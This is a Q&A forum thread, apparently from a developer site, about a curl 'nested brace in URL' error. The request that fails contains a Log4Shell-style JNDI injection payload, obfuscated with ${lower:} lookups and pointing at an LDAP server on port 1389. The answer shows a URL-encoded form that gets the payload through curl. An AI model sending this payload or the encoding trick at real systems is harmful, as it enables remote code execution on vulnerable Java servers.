Nested Brace in URL curl syntax error with JNDI

Question

I am getting a error when running the below code. Can you tell me what is wrong in the syntax. I have tried all the possibilities by putting ", double quotes, , etc. but no luck.

Error: curl: (3) nested brace in URL position 62:

curl 'http://localhost:8080/rest/users/user/updateuser?cmd=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1:1389/#Exploit}' -H 'ID:1234567' -H 'Content-Type:application/json' -H 'X-UserName:usern8' --data-raw '{"id": 1,"name": "Name","profession": "Profession"}'

Answer 1

You may have to url encode the query string.

I converted it and its look like this:

cmd%3D%24%7Bjndi%3A%24%7Blower%3Al%7D%24%7Blower%3Ad%7D%24%7Blower%3Aa%7D%24%7Blower%3Ap%7D%3A%2F%2F127.0.0.1%3A1389%2F%23Exploit%7D

The real problem may be what you think is being transferred in the query string.

What you show is not valid JSON.
But I sent it and this is what the Server received.

'argv' => array (0 => 'cmd=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1:1389/',),

'REQUEST_METHOD' => 'POST',

BODY={"id": 1,"name": "Name","profession": "Profession"}

$_SERVER['QUERY_STRING'] = cmd=${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1:1389/

$_POST array ()

$_GET array ('cmd' => '${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1:1389/',)

$_REQUEST array ('cmd' => '${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://127.0.0.1:1389/',)

Is that what you want the Server to receive?
Or did you think that this ${lower:d} resolve to something else?
That looks like a PHP variable. Where did it come from?